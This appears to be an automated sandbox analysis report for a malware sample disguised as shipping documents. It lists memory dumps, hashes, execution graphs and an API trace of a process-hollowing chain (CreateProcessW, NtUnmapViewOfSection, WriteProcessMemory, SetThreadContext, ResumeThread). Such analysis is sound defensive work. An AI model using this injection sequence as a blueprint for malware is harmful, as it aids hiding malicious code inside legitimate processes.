                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c0a99d405a9a0099b46c4d57b13708f3295776cf6780d9bd694ac41a1e83f3c
                      • Instruction ID: fd00b3e105b3655d1d262ca02a6ee3e34f4a25637981cacc87181df4b3994038
                      • Opcode Fuzzy Hash: 0c0a99d405a9a0099b46c4d57b13708f3295776cf6780d9bd694ac41a1e83f3c
                      • Instruction Fuzzy Hash: 1F23FC31D10B1A8ECB15EF68C8946ADF7B1FF99300F54D79AD458A7221EB70AAC4CB41
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ca245f30a41d8ce7e79163bfd6666b71d24b559f7d3e5847bde64d80b6326e8b
                      • Instruction ID: 3c25ac7019334e985bb7fe3102d4d0100c9f838b25f8126360d4ecb2d601d17f
                      • Opcode Fuzzy Hash: ca245f30a41d8ce7e79163bfd6666b71d24b559f7d3e5847bde64d80b6326e8b
                      • Instruction Fuzzy Hash: 5113FC31D10B1A8ACB15EF68C8945ADF7B1FF99300F54D79AE458B7221EB70AAC4CB41
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bbea6e1300146a7ea692860d49b4d2f8ddc74071671a5bfc2b8d010a33f9a76c
                      • Instruction ID: 1599a779896026e07e3584a90f45b6cc08671cec9ab48ad963e9a5bed7aafcb3
                      • Opcode Fuzzy Hash: bbea6e1300146a7ea692860d49b4d2f8ddc74071671a5bfc2b8d010a33f9a76c
                      • Instruction Fuzzy Hash: 121251B0422B468ED720CF65ED5E18D3FB1BB45328BD04209E2A56A2E5DFBC154BCF44
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 293b881af76433aab595ef9655bdeaa9669b825689fa594a81be579bcd69a46d
                      • Instruction ID: b24122ecb291526b505ef5e62aae62bf712c330b223b9784fb3af0ea6060ab77
                      • Opcode Fuzzy Hash: 293b881af76433aab595ef9655bdeaa9669b825689fa594a81be579bcd69a46d
                      • Instruction Fuzzy Hash: 6EB15AB0E00209CFDB11DFA9D98579EBFF2EF88314F148169D915A72A4EB749845CF81
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 479aa3dd55307603518a5403383a455494e0655446675827249de02186a0d0ff
                      • Instruction ID: 38eae8b1a78d9cdc46b02efa74c4259fcab5abd52adb69882bc7e6fad2307777
                      • Opcode Fuzzy Hash: 479aa3dd55307603518a5403383a455494e0655446675827249de02186a0d0ff
                      • Instruction Fuzzy Hash: 85C1A2B0822B468ED720CF65ED5A18D7FB1BB85324B944319E1616B2E4DFBC158BCF44
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1078448309
                      • Opcode ID: 834ab48bfbbc4ba9366b8583c2a55426707181dfcbd2a85c4fad07cbb394024e
                      • Instruction ID: 0a199fd714a46580f2e7512f8e2ed19c8e31eea48e646f193476bac8c58688de
                      • Opcode Fuzzy Hash: 834ab48bfbbc4ba9366b8583c2a55426707181dfcbd2a85c4fad07cbb394024e
                      • Instruction Fuzzy Hash: 9C916E30A1121ADFDB64EF69DA94B7EBBF2AF44304F208529D40197399DB399D81CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: 0fc89cf6dfc0938a527d096d84915e4530f1e8d9059eb2c685a07dfc9eb3a4a6
                      • Instruction ID: c551a4beaa9b94a59c7deeeef463fae1c8da2603a2782e29e8d2fbc3014825bf
                      • Opcode Fuzzy Hash: 0fc89cf6dfc0938a527d096d84915e4530f1e8d9059eb2c685a07dfc9eb3a4a6
                      • Instruction Fuzzy Hash: 64F13134A00215CFDB59EF64DA94A6EBBB3FF84304F248569D4059B399DB35EC86CB80
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: 7bf4843e0e3b111839d7542e39f1e342532329677423c8fa1975983b6f996693
                      • Instruction ID: b7ee885d746d849029fd4c0734eb6e67afb1836943a20a09ba23ade0a7929581
                      • Opcode Fuzzy Hash: 7bf4843e0e3b111839d7542e39f1e342532329677423c8fa1975983b6f996693
                      • Instruction Fuzzy Hash: 0171B230A1022ACFDB68DF68D59066EB7B6FF84708F108929D406DB359DB35ED45CB80
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq
                      • API String ID: 0-2881790790
                      • Opcode ID: 13888df3ccc116294bfc91bf866ce5bda559fe82a6aef4be96d9d34d4179501f
                      • Instruction ID: 852b55a7f4d3b130c98129e6f0a264f350e2ce2c63415c7e5436cb826513bd74
                      • Opcode Fuzzy Hash: 13888df3ccc116294bfc91bf866ce5bda559fe82a6aef4be96d9d34d4179501f
                      • Instruction Fuzzy Hash: 0EB14F30E012198FDB64EF69D99066EBBB2FF84300F248969D405DB395DB75DC86CB81
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0oNp$DqNp$PHkq$]
                      • API String ID: 0-3879191310
                      • Opcode ID: 1d793bbcedd410716e6c744bb3de66e5d24960c40b2654e84103d9a7a7961543
                      • Instruction ID: 7ca8a23b00894c0a54533457dd34c72b1e5d5e690367d1044d26aa7a69a65971
                      • Opcode Fuzzy Hash: 1d793bbcedd410716e6c744bb3de66e5d24960c40b2654e84103d9a7a7961543
                      • Instruction Fuzzy Hash: 388167307101118FCB54DF29D988A6DBBE2FF89315B2185A9E906DB3B6DB31EC45CB50
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: LRkq$LRkq$$kq$$kq
                      • API String ID: 0-2392252538
                      • Opcode ID: 77c08427f292506262a2e93556ddfa51cd0aa787aa4a64f6b539b2e21ff49eb6
                      • Instruction ID: 26f0cdfa9ff93661a22c1c77051ccc167d72da5ffb712d78aa466a8f3d5c3a70
                      • Opcode Fuzzy Hash: 77c08427f292506262a2e93556ddfa51cd0aa787aa4a64f6b539b2e21ff49eb6
                      • Instruction Fuzzy Hash: 1C518330B002168FDB55EF68DA40A6EB7E6FF84304F14C969E4069B3A9DA31ED44CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq
                      • API String ID: 0-2881790790
                      • Opcode ID: 30e68273ee72a881f0f5059a67d50e5c3934a86da8de5197024cd3f3775c215b
                      • Instruction ID: 3a55d211a1bd59ba637adf599bb64e2eb38301f12c1df13dee324eefc6939e1e
                      • Opcode Fuzzy Hash: 30e68273ee72a881f0f5059a67d50e5c3934a86da8de5197024cd3f3775c215b
                      • Instruction Fuzzy Hash: 98517E30E102168FCF65EB68D6806AEB7B2EF88300F25896AD445E7355DB35DC42CF91

                      Execution Graph

                      Execution Coverage:55%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:92
                      Total number of Limit Nodes:0
                      execution_graph 722 1050971 723 105098e 722->723 724 10509fd VirtualAlloc 722->724 726 1050a9f 724->726 625 1160000 658 1160054 625->658 627 1160006 690 1160420 627->690 629 1160083 630 1160420 VirtualAlloc 629->630 631 116008f 630->631 632 1160420 VirtualAlloc 631->632 633 1160098 632->633 634 1160420 VirtualAlloc 633->634 635 11600a1 634->635 636 1160420 VirtualAlloc 635->636 637 11600aa 636->637 638 1160420 VirtualAlloc 637->638 639 11600b6 638->639 640 1160155 CreateProcessW 639->640 641 1160170 640->641 642 116018b NtUnmapViewOfSection 641->642 643 116019b 642->643 644 11601b8 VirtualAllocEx 643->644 645 11601d2 644->645 646 1160214 WriteProcessMemory 645->646 647 1160220 646->647 648 11602fa WriteProcessMemory 647->648 649 116031e 647->649 648->647 650 116034f Wow64GetThreadContext 649->650 651 116035e 650->651 652 116039e WriteProcessMemory 651->652 653 11603aa 652->653 654 11603e5 Wow64SetThreadContext 653->654 655 11603f5 654->655 656 1160407 ResumeThread 655->656 657 1160415 656->657 659 116005e 658->659 660 1160420 VirtualAlloc 659->660 661 1160083 660->661 662 1160420 VirtualAlloc 661->662 663 116008f 662->663 664 1160420 VirtualAlloc 663->664 665 1160098 664->665 666 1160420 VirtualAlloc 665->666 667 11600a1 666->667 668 1160420 VirtualAlloc 667->668 669 11600aa 668->669 670 1160420 VirtualAlloc 669->670 671 11600b6 670->671 672 1160155 CreateProcessW 671->672 673 1160170 672->673 674 116018b NtUnmapViewOfSection 673->674 675 116019b 674->675 676 11601b8 VirtualAllocEx 675->676 677 11601d2 676->677 678 1160214 WriteProcessMemory 677->678 679 1160220 678->679 680 11602fa WriteProcessMemory 679->680 681 116031e 679->681 680->679 682 116034f Wow64GetThreadContext 681->682 683 116035e 682->683 684 116039e WriteProcessMemory 683->684 685 11603aa 684->685 686 11603e5 Wow64SetThreadContext 685->686 687 11603f5 686->687 688 1160407 ResumeThread 687->688 689 1160415 688->689 689->627 691 1160427 690->691 692 1160432 VirtualAlloc 691->692 693 116044a 692->693 693->629 718 1050ac9 719 1050ad0 CallWindowProcA 718->719 721 1050b4a 719->721 694 1050898 695 10508a9 694->695 702 10504b4 695->702 698 10504b4 VirtualAlloc 699 105091e 698->699 706 10504c0 699->706 703 1050a28 VirtualAlloc 702->703 705 105090a 703->705 705->698 707 1050ad0 CallWindowProcA 706->707 709 1050963 707->709 710 1050888 711 1050898 710->711 712 10504b4 VirtualAlloc 711->712 713 105090a 712->713 714 10504b4 VirtualAlloc 713->714 715 105091e 714->715 716 10504c0 CallWindowProcA 715->716 717 1050963 716->717

                      Callgraph

                      • Executed
                      • Not Executed
                      • Opacity -> Relevance
                      • Disassembly available
                      callgraph 0 Function_01050184 1 Function_01050006 2 Function_01050280 3 Function_01050080 4 Function_01050100 5 Function_0105020D 6 Function_0105028C 7 Function_0105010C 8 Function_01050308 9 Function_01050388 10 Function_01050488 11 Function_01050888 31 Function_010504B4 11->31 46 Function_010504C0 11->46 12 Function_01160419 13 Function_01050495 14 Function_01050314 15 Function_01050190 16 Function_01050090 17 Function_01160000 17->12 36 Function_01160420 17->36 45 Function_01160054 17->45 49 Function_01160450 17->49 18 Function_0105021D 19 Function_0105039D 20 Function_0105049D 21 Function_0105011C 22 Function_01050499 23 Function_01050898 23->31 23->46 24 Function_010502A4 25 Function_010501A0 26 Function_010500A0 27 Function_01050320 28 Function_010501AC 29 Function_0105012C 30 Function_0105032C 32 Function_010503B4 33 Function_01050230 34 Function_010500B0 35 Function_010502B0 36->12 36->49 37 Function_010500BC 38 Function_0105013C 39 Function_010501B8 40 Function_01050338 41 Function_011604AB 42 Function_01050245 43 Function_010501C4 44 Function_01050344 45->12 45->36 45->49 47 Function_010502C0 48 Function_010503C0 49->41 67 Function_01160477 49->67 50 Function_0105004D 51 Function_0105014C 52 Function_01050AC9 53 Function_01050848 54 Function_010500C8 55 Function_010500D4 56 Function_010501D0 57 Function_01050350 58 Function_010503D0 59 Function_010504D0 60 Function_0105015C 61 Function_0105035C 62 Function_01050258 63 Function_010502D8 64 Function_010500E4 65 Function_01050264 66 Function_010502E4 68 Function_01050060 69 Function_010501E0 70 Function_0105046D 71 Function_0105016C 72 Function_010501EC 73 Function_0105036C 74 Function_01050971 75 Function_010500F0 76 Function_01050070 77 Function_01050270 78 Function_010502F0 79 Function_010502FC 80 Function_01050178 81 Function_010501F8 82 Function_01050378

                      Control-flow Graph

                      APIs
                        • Part of subcall function 01160054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 01160167
                      • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 01160192
                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 011601C9
                      • WriteProcessMemory.KERNELBASE ref: 01160217
                      • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 011602FD
                      • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 01160355
                      • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 011603A1
                      • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 011603EC
                      • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0116040C
                      Memory Dump Source
                      • Source File: 00000002.00000002.1889208211.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_1160000_adobe.jbxd
                      Similarity
                      • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                      • String ID:
                      • API String ID: 2814188497-0
                      • Opcode ID: d2e3399e7e2e803baa44f49aead7ea5148095292141855194726177a5406df7e
                      • Instruction ID: 38f94cd813db0990e401e1186450574e6ab39dcbd160e9cf4400e9e3a48c6a3e
                      • Opcode Fuzzy Hash: d2e3399e7e2e803baa44f49aead7ea5148095292141855194726177a5406df7e
                      • Instruction Fuzzy Hash: 83B1FD74790245BFE62977F1DC16F293729DF6AB0DF1480A9F2005F1D2CBA359318662

                      Control-flow Graph

                      APIs
                        • Part of subcall function 01160420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01160083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0116043F
                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 01160167
                      • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 01160192
                      • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 011601C9
                      • WriteProcessMemory.KERNELBASE ref: 01160217
                      • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 011602FD
                      • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 01160355
                      • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 011603A1
                      • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 011603EC
                      • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0116040C
                      Memory Dump Source
                      • Source File: 00000002.00000002.1889208211.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_1160000_adobe.jbxd
                      Similarity
                      • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                      • String ID:
                      • API String ID: 4009322845-0
                      • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                      • Instruction ID: ff3851283a4aeb50dbc897e90b3c9f03a7a6fb6cd372fed955d63ff762fba4fe
                      • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                      • Instruction Fuzzy Hash: 7FA1CA74790206BFE62977F1DC46F393619DFA9B0DF2081A8F2006F1D1CBA369319662

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 349 1050ac9-1050b0b 351 1050b13-1050b48 CallWindowProcA 349->351 352 1050b51-1050b65 351->352 353 1050b4a-1050b50 351->353 353->352
                      APIs
                      • CallWindowProcA.USER32(?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 01050B3B
                      Memory Dump Source
                      • Source File: 00000002.00000002.1889069060.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_1050000_adobe.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 43d4c2a87c81ead8e61386fbe3240dac938f399df91be5984ac657ac8eaf501e
                      • Instruction ID: 379ceb35b6f078f4629eaf9ef2095dbff9c762763920b806a04471705c5be997
                      • Opcode Fuzzy Hash: 43d4c2a87c81ead8e61386fbe3240dac938f399df91be5984ac657ac8eaf501e
                      • Instruction Fuzzy Hash: E81132B5800248DFCB10CF9AD884BDEBFF8EB49324F20845AE958A7250D375A944CFA0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 355 10504c0-1050b48 CallWindowProcA 358 1050b51-1050b65 355->358 359 1050b4a-1050b50 355->359 359->358
                      APIs
                      • CallWindowProcA.USER32(?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 01050B3B
                      Memory Dump Source
                      • Source File: 00000002.00000002.1889069060.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_1050000_adobe.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: 4fee218bcfb4459fd09b34481589b3ae0ddda8c83116be97e795487b15b7ffa8
                      • Instruction ID: 5ad5e3c5e0e00b0e8505b0424af9f3efc947b8f56dca6b140bef9189b4be65f1
                      • Opcode Fuzzy Hash: 4fee218bcfb4459fd09b34481589b3ae0ddda8c83116be97e795487b15b7ffa8
                      • Instruction Fuzzy Hash: 511143B5804248DFCB10CF8AC884BDFBFF4EB48320F208429EA59A7210D375A940CFA4

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 361 1050971-105098c 362 10509fd-1050a9d VirtualAlloc 361->362 363 105098e-10509fc 361->363 375 1050aa6-1050aba 362->375 376 1050a9f-1050aa5 362->376 376->375
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,0105090A,00000040,00001000), ref: 01050A90
                      Memory Dump Source
                      • Source File: 00000002.00000002.1889069060.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_1050000_adobe.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: dc4726bbfac302aaee307073c5f4c4fa5cb4a32f608866a7eece8b71de78ddaf
                      • Instruction ID: c757e769b21c46d8437f67d6b4f1ef3653985b34af4c886684b18ee0ef72b480
                      • Opcode Fuzzy Hash: dc4726bbfac302aaee307073c5f4c4fa5cb4a32f608866a7eece8b71de78ddaf
                      • Instruction Fuzzy Hash: 074169756002448FC750DF69C948A9EBFF5FF89310F2584AAE549DB366CB34AC05CBA0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 382 10504b4-1050a9d VirtualAlloc 385 1050aa6-1050aba 382->385 386 1050a9f-1050aa5 382->386 386->385
                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,?,?,?,?,?,0105090A,00000040,00001000), ref: 01050A90
                      Memory Dump Source
                      • Source File: 00000002.00000002.1889069060.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_1050000_adobe.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: fb275a1bd1b5ca4ab6a8b9505d72dcc51c30c886c84d0382e0000c5f384e9a31
                      • Instruction ID: 1e59f5749d9d07278d756eec08609cda479cb03b07e583e0d7e3a789b952a9c8
                      • Opcode Fuzzy Hash: fb275a1bd1b5ca4ab6a8b9505d72dcc51c30c886c84d0382e0000c5f384e9a31
                      • Instruction Fuzzy Hash: CF1102B5900649DFCB60DF9AC444BDEBBF4EB48320F208429E998A7251D375A944CFA4

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01160083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0116043F
                      Memory Dump Source
                      • Source File: 00000002.00000002.1889208211.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_1160000_adobe.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                      • Instruction ID: 5204583de08a020ad300c5f23111049483c5f029da7765cc3e85193ed1667988
                      • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                      • Instruction Fuzzy Hash: 14D022702843027AF2267BB14C02F283684EF58B0EF400894F304380E0C7BB98380256

                      Execution Graph

                      Execution Coverage:11.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:66
                      Total number of Limit Nodes:9
                      execution_graph 26475 1940848 26476 194084e 26475->26476 26477 194091b 26476->26477 26480 1941483 26476->26480 26485 194134f 26476->26485 26481 1941366 26480->26481 26482 194147a 26481->26482 26483 1941483 2 API calls 26481->26483 26490 1948219 26481->26490 26482->26476 26483->26481 26486 19412b6 26485->26486 26487 1941353 26485->26487 26486->26476 26487->26486 26488 1941483 2 API calls 26487->26488 26489 1948219 2 API calls 26487->26489 26488->26487 26489->26487 26492 1948223 26490->26492 26491 19482d9 26491->26481 26492->26491 26496 6d2fb33 26492->26496 26507 6d2f8d9 26492->26507 26513 6d2f8e8 26492->26513 26499 6d2fb36 26496->26499 26500 6d2f8fd 26496->26500 26497 6d2fb12 26497->26491 26498 6d2fbd0 26498->26491 26499->26498 26519 194ed08 26499->26519 26524 194ecf9 26499->26524 26500->26497 26502 6d2fb38 GlobalMemoryStatusEx GlobalMemoryStatusEx 26500->26502 26505 6d2fb33 GlobalMemoryStatusEx GlobalMemoryStatusEx 26500->26505 26506 6d2fd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 26500->26506 26501 6d2fc9e 26501->26491 26502->26500 26505->26500 26506->26500 26509 6d2f8fd 26507->26509 26508 6d2fb12 26508->26491 26509->26508 26510 6d2fb33 GlobalMemoryStatusEx GlobalMemoryStatusEx 26509->26510 26511 6d2fd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 26509->26511 26512 6d2fb38 GlobalMemoryStatusEx GlobalMemoryStatusEx 26509->26512 26510->26509 26511->26509 26512->26509 26515 6d2f8fd 26513->26515 26514 6d2fb12 26514->26491 26515->26514 26516 6d2fb33 GlobalMemoryStatusEx GlobalMemoryStatusEx 26515->26516 26517 6d2fd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 26515->26517 26518 6d2fb38 GlobalMemoryStatusEx GlobalMemoryStatusEx 26515->26518 26516->26515 26517->26515 26518->26515 26529 194ed40 26519->26529 26535 194ed3b 26519->26535 26541 194eddb 26519->26541 26520 194ed16 26520->26501 26525 194ed16 26524->26525 26526 194ed40 2 API calls 26524->26526 26527 194eddb 2 API calls 26524->26527 26528 194ed3b 2 API calls 26524->26528 26525->26501 26526->26525 26527->26525 26528->26525 26530 194ed75 26529->26530 26531 194ed4d 26529->26531 26532 194ed92 26530->26532 26534 194eddb 2 API calls 26530->26534 26550 194ee18 26530->26550 26531->26520 26532->26520 26534->26532 26536 194ed75 26535->26536 26537 194ed4d 26535->26537 26538 194ed92 26536->26538 26539 194ee18 GlobalMemoryStatusEx 26536->26539 26540 194eddb 2 API calls 26536->26540 26537->26520 26538->26520 26539->26538 26540->26538 26542 194edee 26541->26542 26543 194ed79 26541->26543 26544 194edfb 26542->26544 26546 194ee5e GlobalMemoryStatusEx 26542->26546 26548 194ee18 GlobalMemoryStatusEx 26543->26548 26549 194eddb GlobalMemoryStatusEx 26543->26549 26544->26520 26545 194ed92 26545->26520 26547 194ee8e 26546->26547 26547->26520 26548->26545 26549->26545 26551 194ee5e GlobalMemoryStatusEx 26550->26551 26552 194ee8e 26551->26552 26552->26532
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: 3c0e6190202dc1ecf41c40c3fba7b8503e6b447e594934ce56377b8dff236922
                      • Instruction ID: a3cef259703eb94986cce5b025c91b6148f29bae9fcc6a141a43af4fba6eb05a
                      • Opcode Fuzzy Hash: 3c0e6190202dc1ecf41c40c3fba7b8503e6b447e594934ce56377b8dff236922
                      • Instruction Fuzzy Hash: 28D26C30E002168FCB64DF68C584A9DB7F2FF99314F5585A9E409AB365EB34ED85CB80
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: 071c3275bfbf1074e14e402f260099f1858904a97c48453d359a0a4c90ccbe3a
